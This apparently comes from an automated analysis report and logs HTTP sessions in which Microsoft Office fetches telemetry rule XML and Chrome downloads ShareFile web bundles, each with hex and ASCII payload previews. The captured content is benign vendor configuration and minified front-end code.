                                                                                                                                                                                                                                                                                x-ms-request-id: 966bb812-701e-005c-6826-1abb94000000
                                                                                                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                x-azure-ref: 20241009T180519Z-185b7d577bd787g6hpze00e34800000000r000000000s262
                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                2024-10-09 18:05:19 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120632" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120631" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                111192.168.2.64983513.107.246.45443
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-09 18:05:19 UTC192OUTGET /rules/rule120631v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                2024-10-09 18:05:19 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Date: Wed, 09 Oct 2024 18:05:19 GMT
                                                                                                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                                                                                                Content-Length: 415
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                                                                                                                                                                                ETag: "0x8DC582B988EBD12"
                                                                                                                                                                                                                                                                                x-ms-request-id: dc8c5847-801e-0048-5fcd-19f3fb000000
                                                                                                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                x-azure-ref: 20241009T180519Z-185b7d577bdfx2dd0gsb231cq0000000018g00000000bxpk
                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                2024-10-09 18:05:19 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 48 68 5d 5b 55 75 5d 5b 41 61 5d 5b 57 77 5d 5b 45 65 5d 5b 49 69 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120631" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120629" /> <SR T="2" R="([Hh][Uu][Aa][Ww][Ee][Ii])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                112192.168.2.64984013.107.246.45443
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-09 18:05:19 UTC192OUTGET /rules/rule120635v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                2024-10-09 18:05:19 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Date: Wed, 09 Oct 2024 18:05:19 GMT
                                                                                                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                                                                                                Content-Length: 420
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:25:53 GMT
                                                                                                                                                                                                                                                                                ETag: "0x8DC582B9DAE3EC0"
                                                                                                                                                                                                                                                                                x-ms-request-id: 856b37ee-301e-001f-69fa-19aa3a000000
                                                                                                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                x-azure-ref: 20241009T180519Z-185b7d577bdcmhtqq5qad662uw00000001e000000000nyn9
                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                2024-10-09 18:05:19 UTC420INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 54 74 5d 5b 4f 6f 5d 5b 53 73 5d 5b 48 68 5d 5b 49 69 5d 5b 42 62 5d 5b 41 61 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f
                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120635" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120633" /> <SR T="2" R="^([Tt][Oo][Ss][Hh][Ii][Bb][Aa])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                113192.168.2.64983913.224.189.1094432612C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-09 18:05:19 UTC573OUTGET /sharefile-web/sharefiledev-rubicon-pilet/0.33.3/package/dist/main.css HTTP/1.1
                                                                                                                                                                                                                                                                                Host: piletfeed-cdn.sharefile.io
                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                Accept: text/css,*/*;q=0.1
                                                                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                Sec-Fetch-Dest: style
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                2024-10-09 18:05:19 UTC528INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Content-Type: text/css
                                                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Last-Modified: Mon, 23 Sep 2024 13:44:13 GMT
                                                                                                                                                                                                                                                                                x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                Server: AmazonS3
                                                                                                                                                                                                                                                                                Date: Tue, 08 Oct 2024 18:49:11 GMT
                                                                                                                                                                                                                                                                                ETag: "d41d8cd98f00b204e9800998ecf8427e"
                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                X-Cache: Hit from cloudfront
                                                                                                                                                                                                                                                                                Via: 1.1 f797fc0ae68a3abc35e081e46174c9f2.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                                X-Amz-Cf-Pop: FRA2-C1
                                                                                                                                                                                                                                                                                X-Amz-Cf-Id: YYB9zvyQ_GsMR19bpcl79OR_nBD1Y0UgLzt6fPzZGHFoCetzLm8YTg==
                                                                                                                                                                                                                                                                                Age: 83769
                                                                                                                                                                                                                                                                                Vary: Origin


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                114192.168.2.64984213.224.189.1154432612C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-09 18:05:19 UTC425OUTGET /sharefile-web/sharefiledev-integrations-pilet/0.0.175/package/dist/index.js HTTP/1.1
                                                                                                                                                                                                                                                                                Host: piletfeed-cdn.sharefile.io
                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                2024-10-09 18:05:19 UTC549INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Content-Type: application/x-javascript
                                                                                                                                                                                                                                                                                Content-Length: 650980
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Last-Modified: Thu, 22 Aug 2024 14:51:30 GMT
                                                                                                                                                                                                                                                                                x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                Server: AmazonS3
                                                                                                                                                                                                                                                                                Date: Wed, 09 Oct 2024 07:37:41 GMT
                                                                                                                                                                                                                                                                                ETag: "d46761310b3c627cc468f3b845e55eca"
                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                X-Cache: Hit from cloudfront
                                                                                                                                                                                                                                                                                Via: 1.1 29051585a13addd312c8ac9d527433c6.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                                X-Amz-Cf-Pop: FRA2-C1
                                                                                                                                                                                                                                                                                X-Amz-Cf-Id: Ftvpgt84dErAsPPESUbQQu145V3n8PwwwLvs7ONR354fTDTf2nNKIA==
                                                                                                                                                                                                                                                                                Age: 37659
                                                                                                                                                                                                                                                                                Vary: Origin
                                                                                                                                                                                                                                                                                2024-10-09 18:05:19 UTC16384INData Raw: 2f 2f 40 70 69 6c 65 74 20 76 3a 32 28 77 65 62 70 61 63 6b 43 68 75 6e 6b 70 72 5f 73 68 61 72 65 66 69 6c 65 64 65 76 69 6e 74 65 67 72 61 74 69 6f 6e 73 70 69 6c 65 74 2c 7b 7d 29 0a 53 79 73 74 65 6d 2e 72 65 67 69 73 74 65 72 28 5b 22 40 73 68 61 72 65 66 69 6c 65 64 65 76 2f 61 6e 74 64 2d 63 6f 6e 66 69 67 22 2c 22 61 6e 74 64 22 2c 22 72 65 61 63 74 22 2c 22 72 65 61 63 74 2d 64 6f 6d 22 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 7b 7d 2c 72 3d 7b 7d 2c 6f 3d 7b 7d 2c 69 3d 7b 7d 3b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 6f 2c 22 5f 5f 65 73 4d 6f 64 75 6c 65 22 2c 7b 76 61 6c 75 65 3a 21 30 7d 29 2c 7b 73 65 74 74 65 72 73 3a 5b 66 75 6e 63 74 69 6f 6e 28 65 29 7b 6e 2e 73
                                                                                                                                                                                                                                                                                Data Ascii: //@pilet v:2(webpackChunkpr_sharefiledevintegrationspilet,{})System.register(["@sharefiledev/antd-config","antd","react","react-dom"],(function(e,t){var n={},r={},o={},i={};return Object.defineProperty(o,"__esModule",{value:!0}),{setters:[function(e){n.s
                                                                                                                                                                                                                                                                                2024-10-09 18:05:20 UTC16384INData Raw: 28 28 66 75 6e 63 74 69 6f 6e 28 29 7b 61 28 29 2c 64 65 6c 65 74 65 20 65 2e 70 65 6e 64 69 6e 67 46 6f 72 6d 73 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 7d 29 29 5b 22 63 61 74 63 68 22 5d 28 28 66 75 6e 63 74 69 6f 6e 28 29 7b 64 65 6c 65 74 65 20 65 2e 70 65 6e 64 69 6e 67 46 6f 72 6d 73 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 7d 29 29 7d 2c 65 2e 70 72 6f 74 6f 74 79 70 65 2e 6e 65 65 64 73 49 46 72 61 6d 65 41 75 74 68 46 6f 72 43 6f 6e 6e 65 63 74 6f 72 73 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 69 73 42 72 6f 77 73 65 72 28 22 65 64 67 65 22 29 7c 7c 74 68 69 73 2e 69 73 42 72 6f 77 73 65 72 28 22 73 61 66 61 72 69 22 29 7d 2c 65 2e 70 72 6f 74 6f 74 79 70 65 2e 69 73 42 72 6f 77 73 65 72 3d 66 75 6e 63 74 69 6f
                                                                                                                                                                                                                                                                                Data Ascii: ((function(){a(),delete e.pendingFormsAuthentication}))["catch"]((function(){delete e.pendingFormsAuthentication}))},e.prototype.needsIFrameAuthForConnectors=function(){return this.isBrowser("edge")||this.isBrowser("safari")},e.prototype.isBrowser=functio
                                                                                                                                                                                                                                                                                2024-10-09 18:05:20 UTC16384INData Raw: 72 3d 30 3b 72 3c 6e 2e 6c 65 6e 67 74 68 3b 72 2b 2b 29 6e 5b 72 5d 3d 61 72 67 75 6d 65 6e 74 73 5b 72 5d 3b 72 65 74 75 72 6e 20 65 2e 61 70 70 6c 79 28 74 2c 6e 29 7d 7d 7d 2c 36 35 39 37 3a 28 65 2c 74 2c 6e 29 3d 3e 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 72 3d 6e 28 34 35 31 35 29 3b 66 75 6e 63 74 69 6f 6e 20 6f 28 65 29 7b 72 65 74 75 72 6e 20 65 6e 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 65 29 2e 72 65 70 6c 61 63 65 28 2f 25 33 41 2f 67 69 2c 22 3a 22 29 2e 72 65 70 6c 61 63 65 28 2f 25 32 34 2f 67 2c 22 24 22 29 2e 72 65 70 6c 61 63 65 28 2f 25 32 43 2f 67 69 2c 22 2c 22 29 2e 72 65 70 6c 61 63 65 28 2f 25 32 30 2f 67 2c 22 2b 22 29 2e 72 65 70 6c 61 63 65 28 2f 25 35 42 2f 67 69 2c 22 5b 22 29 2e 72 65 70 6c 61 63 65
                                                                                                                                                                                                                                                                                Data Ascii: r=0;r<n.length;r++)n[r]=arguments[r];return e.apply(t,n)}}},6597:(e,t,n)=>{"use strict";var r=n(4515);function o(e){return encodeURIComponent(e).replace(/%3A/gi,":").replace(/%24/g,"$").replace(/%2C/gi,",").replace(/%20/g,"+").replace(/%5B/gi,"[").replace
                                                                                                                                                                                                                                                                                2024-10-09 18:05:20 UTC14808INData Raw: 65 54 72 61 6e 73 6c 61 74 69 6f 6e 73 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 74 68 69 73 2e 67 65 74 44 61 74 61 42 79 4c 61 6e 67 75 61 67 65 28 65 29 3b 72 65 74 75 72 6e 21 21 28 74 26 26 4f 62 6a 65 63 74 2e 6b 65 79 73 28 74 29 7c 7c 5b 5d 29 2e 66 69 6e 64 28 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 74 5b 65 5d 26 26 4f 62 6a 65 63 74 2e 6b 65 79 73 28 74 5b 65 5d 29 2e 6c 65 6e 67 74 68 3e 30 7d 29 29 7d 7d 2c 7b 6b 65 79 3a 22 74 6f 4a 53 4f 4e 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 64 61 74 61 7d 7d 5d 29 2c 6e 7d 28 78 29 2c 4d 3d 7b 70 72 6f 63 65 73 73 6f 72 73 3a 7b 7d 2c 61 64 64 50 6f 73 74 50 72 6f 63 65 73 73 6f 72 3a 66 75 6e
                                                                                                                                                                                                                                                                                Data Ascii: eTranslations",value:function(e){var t=this.getDataByLanguage(e);return!!(t&&Object.keys(t)||[]).find((function(e){return t[e]&&Object.keys(t[e]).length>0}))}},{key:"toJSON",value:function(){return this.data}}]),n}(x),M={processors:{},addPostProcessor:fun
                                                                                                                                                                                                                                                                                2024-10-09 18:05:20 UTC16384INData Raw: 32 2c 31 30 5d 2c 66 63 3a 31 35 7d 2c 7b 6c 6e 67 73 3a 5b 22 6c 76 22 5d 2c 6e 72 3a 5b 31 2c 32 2c 30 5d 2c 66 63 3a 31 36 7d 2c 7b 6c 6e 67 73 3a 5b 22 6d 6b 22 5d 2c 6e 72 3a 5b 31 2c 32 5d 2c 66 63 3a 31 37 7d 2c 7b 6c 6e 67 73 3a 5b 22 6d 6e 6b 22 5d 2c 6e 72 3a 5b 30 2c 31 2c 32 5d 2c 66 63 3a 31 38 7d 2c 7b 6c 6e 67 73 3a 5b 22 6d 74 22 5d 2c 6e 72 3a 5b 31 2c 32 2c 31 31 2c 32 30 5d 2c 66 63 3a 31 39 7d 2c 7b 6c 6e 67 73 3a 5b 22 6f 72 22 5d 2c 6e 72 3a 5b 32 2c 31 5d 2c 66 63 3a 32 7d 2c 7b 6c 6e 67 73 3a 5b 22 72 6f 22 5d 2c 6e 72 3a 5b 31 2c 32 2c 32 30 5d 2c 66 63 3a 32 30 7d 2c 7b 6c 6e 67 73 3a 5b 22 73 6c 22 5d 2c 6e 72 3a 5b 35 2c 31 2c 32 2c 33 5d 2c 66 63 3a 32 31 7d 2c 7b 6c 6e 67 73 3a 5b 22 68 65 22 2c 22 69 77 22 5d 2c 6e 72 3a 5b
                                                                                                                                                                                                                                                                                Data Ascii: 2,10],fc:15},{lngs:["lv"],nr:[1,2,0],fc:16},{lngs:["mk"],nr:[1,2],fc:17},{lngs:["mnk"],nr:[0,1,2],fc:18},{lngs:["mt"],nr:[1,2,11,20],fc:19},{lngs:["or"],nr:[2,1],fc:2},{lngs:["ro"],nr:[1,2,20],fc:20},{lngs:["sl"],nr:[5,1,2,3],fc:21},{lngs:["he","iw"],nr:[
                                                                                                                                                                                                                                                                                2024-10-09 18:05:20 UTC16384INData Raw: 74 68 69 73 2e 6c 6f 67 67 65 72 2e 77 61 72 6e 28 22 4e 6f 20 62 61 63 6b 65 6e 64 20 77 61 73 20 61 64 64 65 64 20 76 69 61 20 69 31 38 6e 65 78 74 2e 75 73 65 2e 20 57 69 6c 6c 20 6e 6f 74 20 6c 6f 61 64 20 72 65 73 6f 75 72 63 65 73 2e 22 29 2c 6f 26 26 6f 28 29 3b 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 65 26 26 28 65 3d 74 68 69 73 2e 6c 61 6e 67 75 61 67 65 55 74 69 6c 73 2e 74 6f 52 65 73 6f 6c 76 65 48 69 65 72 61 72 63 68 79 28 65 29 29 2c 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 74 26 26 28 74 3d 5b 74 5d 29 3b 76 61 72 20 69 3d 74 68 69 73 2e 71 75 65 75 65 4c 6f 61 64 28 65 2c 74 2c 72 2c 6f 29 3b 69 66 28 21 69 2e 74 6f 4c 6f 61 64 2e 6c 65 6e 67 74 68 29 72 65 74 75 72 6e 20 69 2e 70 65 6e 64 69 6e 67 2e 6c 65 6e 67 74
                                                                                                                                                                                                                                                                                Data Ascii: this.logger.warn("No backend was added via i18next.use. Will not load resources."),o&&o();"string"==typeof e&&(e=this.languageUtils.toResolveHierarchy(e)),"string"==typeof t&&(t=[t]);var i=this.queueLoad(e,t,r,o);if(!i.toLoad.length)return i.pending.lengt
                                                                                                                                                                                                                                                                                2024-10-09 18:05:20 UTC16384INData Raw: 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 54 68 69 73 3f 67 6c 6f 62 61 6c 54 68 69 73 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 3f 77 69 6e 64 6f 77 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 6e 2e 67 3f 6e 2e 67 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 73 65 6c 66 26 26 73 65 6c 66 3b 76 61 72 20 41 65 2c 53 65 2c 49 65 3d 28 28 41 65 3d 7b 65 78 70 6f 72 74 73 3a 7b 7d 7d 29 2e 65 78 70 6f 72 74 73 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 75 6e 63 74 69 6f 6e 20 74 28 72 29 7b 69 66 28 6e 5b 72 5d 29 72 65 74 75 72 6e 20 6e 5b 72 5d 2e 65 78 70 6f 72 74 73 3b 76 61 72 20 6f 3d 6e 5b 72 5d 3d 7b 69 3a 72 2c 6c 3a 21 31 2c 65 78 70 6f 72 74 73 3a 7b 7d 7d 3b 72
                                                                                                                                                                                                                                                                                Data Ascii: ed"!=typeof globalThis?globalThis:"undefined"!=typeof window?window:"undefined"!=typeof n.g?n.g:"undefined"!=typeof self&&self;var Ae,Se,Ie=((Ae={exports:{}}).exports=function(e){function t(r){if(n[r])return n[r].exports;var o=n[r]={i:r,l:!1,exports:{}};r
                                                                                                                                                                                                                                                                                2024-10-09 18:05:20 UTC16384INData Raw: 66 4c 61 6e 67 7c 68 74 6d 6c 46 6f 72 7c 68 74 74 70 45 71 75 69 76 7c 69 64 7c 69 6e 70 75 74 4d 6f 64 65 7c 69 6e 74 65 67 72 69 74 79 7c 69 73 7c 6b 65 79 50 61 72 61 6d 73 7c 6b 65 79 54 79 70 65 7c 6b 69 6e 64 7c 6c 61 62 65 6c 7c 6c 61 6e 67 7c 6c 69 73 74 7c 6c 6f 61 64 69 6e 67 7c 6c 6f 6f 70 7c 6c 6f 77 7c 6d 61 72 67 69 6e 48 65 69 67 68 74 7c 6d 61 72 67 69 6e 57 69 64 74 68 7c 6d 61 78 7c 6d 61 78 4c 65 6e 67 74 68 7c 6d 65 64 69 61 7c 6d 65 64 69 61 47 72 6f 75 70 7c 6d 65 74 68 6f 64 7c 6d 69 6e 7c 6d 69 6e 4c 65 6e 67 74 68 7c 6d 75 6c 74 69 70 6c 65 7c 6d 75 74 65 64 7c 6e 61 6d 65 7c 6e 6f 6e 63 65 7c 6e 6f 56 61 6c 69 64 61 74 65 7c 6f 70 65 6e 7c 6f 70 74 69 6d 75 6d 7c 70 61 74 74 65 72 6e 7c 70 6c 61 63 65 68 6f 6c 64 65 72 7c 70 6c
                                                                                                                                                                                                                                                                                Data Ascii: fLang|htmlFor|httpEquiv|id|inputMode|integrity|is|keyParams|keyType|kind|label|lang|list|loading|loop|low|marginHeight|marginWidth|max|maxLength|media|mediaGroup|method|min|minLength|multiple|muted|name|nonce|noValidate|open|optimum|pattern|placeholder|pl
                                                                                                                                                                                                                                                                                2024-10-09 18:05:20 UTC16384INData Raw: 61 74 68 2c 6d 2e 49 6e 69 74 53 74 61 74 65 53 74 6f 72 65 53 77 69 74 63 68 6f 76 65 72 29 3b 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 6c 2c 22 73 74 6f 72 65 22 2c 7b 65 6e 75 6d 65 72 61 62 6c 65 3a 21 31 7d 29 2c 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 6c 2c 22 73 74 61 74 65 22 2c 7b 65 6e 75 6d 65 72 61 62 6c 65 3a 21 31 7d 29 2c 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 6c 2c 22 73 6f 75 72 63 65 22 2c 7b 65 6e 75 6d 65 72 61 62 6c 65 3a 21 31 7d 29 2c 6c 2e 73 74 61 74 65 2e 72 65 63 6f 6e 73 74 72 75 63 74 28 62 2c 6c 2e 73 74 6f 72 65 2e 67 65 74 28 62 29 2c 6c 2e 73 74 6f 72 65 2e 65 64 69 74 69 6f 6e 2c 6c 2e 73 6f 75 72 63 65 21 3d 3d 65 29 2c 6c 2e 73 6f 75 72 63 65
                                                                                                                                                                                                                                                                                Data Ascii: ath,m.InitStateStoreSwitchover);Object.defineProperty(l,"store",{enumerable:!1}),Object.defineProperty(l,"state",{enumerable:!1}),Object.defineProperty(l,"source",{enumerable:!1}),l.state.reconstruct(b,l.store.get(b),l.store.edition,l.source!==e),l.source
                                                                                                                                                                                                                                                                                2024-10-09 18:05:20 UTC16384INData Raw: 6e 73 69 62 6c 65 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 21 30 7d 2c 70 72 65 76 65 6e 74 45 78 74 65 6e 73 69 6f 6e 73 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 61 28 69 3f 6d 2e 50 72 65 76 65 6e 74 45 78 74 65 6e 73 69 6f 6e 73 5f 53 74 61 74 65 3a 6d 2e 50 72 65 76 65 6e 74 45 78 74 65 6e 73 69 6f 6e 73 5f 56 61 6c 75 65 29 7d 2c 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 6f 29 7b 76 61 72 20 61 3d 6e 28 29 3b 69 66 28 4f 62 6a 65 63 74 28 61 29 3d 3d 3d 61 29 7b 76 61 72 20 73 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 61 2c 6f 29 3b 72 65 74 75 72 6e 20 41 72 72 61 79 2e 69 73 41 72 72 61 79 28
                                                                                                                                                                                                                                                                                Data Ascii: nsible:function(e){return!0},preventExtensions:function(e){return a(i?m.PreventExtensions_State:m.PreventExtensions_Value)},getOwnPropertyDescriptor:function(t,o){var a=n();if(Object(a)===a){var s=Object.getOwnPropertyDescriptor(a,o);return Array.isArray(


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
